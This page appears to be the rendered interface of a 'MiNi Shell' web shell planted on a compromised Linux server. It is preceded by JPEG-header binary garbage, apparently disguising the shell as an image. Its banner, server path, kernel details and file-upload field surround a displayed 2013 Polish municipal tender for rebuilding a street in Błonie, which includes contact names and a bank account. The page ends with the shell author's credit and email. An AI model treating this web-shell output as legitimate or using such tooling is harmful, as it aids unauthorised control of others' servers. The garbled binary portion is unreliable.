JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130830/350910-N-2013.html

<p class="kh_header"><b>Błonie: Przebudowa ulicy Norwida w Błoniu na odcinku od Centrum Kultury do rzeki Rokitnicy 
realizowana w ramach projektu budowy strefy rekreacji i turystyki na terenie parku Bajka w Błoniu.</b><br>
<b>Numer ogłoszenia: 350910 - 2013; data zamieszczenia: 30.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blonie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Norwida w Błoniu na odcinku od Centrum Kultury do rzeki Rokitnicy 
realizowana w ramach projektu budowy strefy rekreacji i turystyki na terenie parku Bajka w Błoniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
   -  demontaż istniejących nawierzchni,
   -  montaż rur osłonowych (ochronnych),
   -  przebudowa istniejącej kanalizacji deszczowej,
   -  nawierzchnie z kostki brukowej szlachetnej kolorowej 1777 m2,
   -  nawierzchnia rozety z betonu kolorowego,
   -  rekultywacja terenów zielonych,
   -  montaż ławek i koszy na śmieci - 12 kpl.

2. Na wykonane roboty Wykonawca udzieli  min. 36 miesięcy gwarancji i rękojmi za wady. Bieg 
     okresu gwarancji rozpoczyna się w dniu następnym licząc od daty odbioru końcowego robót.

3. Szczegółowy opis przedmiotu zamówienia i zakres robót do wykonania zawarty jest 
    w dokumentach załączonych  do niniejszej specyfikacji:
a)projekcie budowlanym i wykonawczym 
b)specyfikacji technicznej wykonania i odbioru robót,
4. W celu wyczerpującego zapoznania się z przyszłą inwestycją Zamawiający zaleca odbycie 
    wizji w terenie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.11.00-9, 45.23.21.30-2, 45.23.32.52-0, 45.23.32.22-1, 45.11.27.11-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium: 
    1. Wysokość wadium.
    1.1. Każda składana oferta musi być zabezpieczona wadium w wysokości 20.000 PLN     
           (słownie: dwadzieścia tysięcy złotych).   
    2. Forma wadium.
    2.1. Wadium może być wnoszone w jednej lub kilku następujących formach:
     a). pieniądzu,
     b). poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo -  
           kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c). gwarancjach bankowych,
     d). gwarancjach ubezpieczeniowych,
     e). poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
          ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju      
          Przedsiębiorczości  (Dz. U. Nr 109, poz. 1158,  z późn. zm.)
    3. Miejsce i sposób wniesienia wadium.
    3.1. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  
           Zamawiającego:  Bank PKO BP S.A.  VO/Warszawa
                                        nr rachunku: 95 1020 1055  0000 9302 0024 2743
    3.2. Do oferty należy dołączyć kopię polecenia przelewu potwierdzoną za zgodność z 
           oryginałem lub dostarczyć ją Zamawiającemu przed otwarciem ofert.
    3.3. Wadium wnoszone w formie pieniężnej uznaje się za wniesione, jeżeli znajdzie się na   
           koncie Zamawiającego przed upływem terminu składania ofert.
           Termin wniesienia wadium potwierdza bank prowadzący bankową obsługę Gminy.
    3.4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
    3.5. W przypadku składania wadium w jednej z form wymienionych w pkt 2.1 niniejszego 
            rozdziału, dokument winien zawierać jednoznacznie sformułowane: nazwę  i adres 
           Zamawiającego, przedmiot zamówienia i nr sprawy, termin obowiązywania dokumentu,     
           wysokość wadium oraz warunki zwrotu i zatrzymania przez Zamawiającego wadium 
           wraz z odsetkami, zgodnie z art. 46 ustawy z dnia 29 stycznia 2004 r. Pzp.
    4. Oryginał wadium (w przypadku przelewu - potwierdzenie dokonania przelewu na konto 
        Zamawiającego) należy złożyć w Wydziale Zamówień Publicznych w Urzędzie Miejskim
        w Błoniu (Ratusz), ul. Rynek 6, pokój nr 3 (parter) - przed upływem terminu składania         
        ofert lub załączyć do oferty.
    5. Wykonawca, który nie wniósł wadium zostaje wykluczony z postępowania na podstawie 
         art. 24 ust. 2 pkt 2, a złożoną przez niego ofertę uznaje się za odrzuconą.
    6. Zwrot wadium.
    6.1. Zamawiający zwraca wadium zgodnie z zapisem art. 46 ust. 1- 4 ustawy Pzp
   7. Utrata wadium.
   7.1. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi
          na wezwanie, o którym mowa w art. 26 ust.3 ustawy Prawo zamówień publicznych
          nie złożył dokumentów lub oświadczeń lub pełnomocnictw, chyba że udowodni, że 
          wynika to z przyczyn nieleżących po jego stronie.
   7.2. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadkach określonych w 
          art.46 ust.5 ustawy jeżeli Wykonawca, którego oferta została wybrana:
    a). odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
          określonych w ofercie,
     b). nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
     c). zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn   
          leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  musi wykazać  że w okresie ostatnich 5 lat przed upływem terminu składania 
ofert, a jeżeli okres   prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót określających, że wykazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, tj.
- roboty drogowe:
       Wykonawca musi wykazać, że wykonał co najmniej jedną robotę polegającą na budowie  
       lub przebudowie  dróg o nawierzchni z kostki brukowej min. 1500 m2. 
       - roboty dotyczące kanalizacji deszczowej/sanitarnej:
       Wykonawca musi wykazać, że wykonał co najmniej jedną robotę polegającą na regulacji 
       studzienek i kratek ściekowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać że dysponuje osobami zdolnymi do wykonania robót objętych 
        przedmiotem zamówienia posiadającymi odpowiednie kwalifikacje w tym:
       - kierownik robót  branży drogowej  posiadający uprawnienia budowlane bez ograniczeń w 
specjalności drogowej,  z co najmniej 3 letnim doświadczeniem w nadzorowaniu robót branży drogowej przy budowie lub przebudowie dróg oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa.
- kierownik robót w specjalności sanitarnej  posiadający uprawnienia budowlane w 
specjalności  sanitarnej w zakresie sieci,  z co najmniej 3 letnim doświadczeniem w nadzorowaniu robót branży branży sanitarnej przy budowie lub przebudowie kanalizacji deszczowej lub sanitarnej oraz aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca wykaże iż posiada opłaconą polisę OC w zakresie prowadzonej działalności 
       związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Na ofertę składają się inne dokumenty wymagane przez Zamawiającego:
1.1. dowód wniesienia wadium
1.2. harmonogram rzeczowo- terminowo- finansowy 
1.3. druk oferty wypełniony i podpisany przez osoby uprawnione,
1.4. druk oświadczenia o przynależności do grupy kapitałowej
1.5. oświadczenie o spełnianiu warunków określonych przepisami art. 44 ustawy Pzp
1.6. podpisany wzór umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, 
        na podstawie której dokonano wyboru Wykonawcy, zgodnie z art. 144 ust.1 ustawy Pzp, 
        chyba że wystąpiły okoliczności:
 1.1. zmiana zakresu robót:
    a). wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności     
         leżących po stronie Wykonawcy, 
    b). rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia. W takim 
         przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym 
         Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, 
         które poniósł Wykonawca w związku z wynikającymi z umowy planowanymi świadczeniami.         
 1.2. zmiana terminu realizacji: 
    a). zmiana terminu realizacji umowy jeżeli uzasadnione to będzie okolicznościami leżącymi 
         po stronie Zamawiającego, w szczególności sytuacją finansową, zdolnościami płatniczymi 
         lub warunkami organizacyjnymi,
    b). z powodu niekorzystnych warunków atmosferycznych wydłużających cykl technologiczny 
         budowy, 
  1.3. w innych przypadkach:
     a). których nie można było przewidzieć w chwili zawarcia umowy, a które nie mają wpływu 
          na wybór Wykonawcy w przeprowadzonym przetargu,
     b). nastąpi ustawowa zmiana obowiązującej stawki podatku VAT, w takim przypadku 
          wysokość wynagrodzenia należnego Wykonawcy ustalona będzie każdorazowo na dzień
          wystawienia faktury (powstania obowiązku podatkowego),
    2. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić 
        zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno 
        przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie, pok nr 3 Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2013 godzina 11:00, miejsce: Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie, pok nr 1 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do kontaktu z Wykonawcami: 
 Iwona Kopczyńska,  Bożena Hofman ( procedury przetargowe) - Urząd Miejski w Błoniu, ul. Rynek 6
 Wydział Zamówień Publicznych,  pok. nr 3,  tel. 22 725-30-04  w.180,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com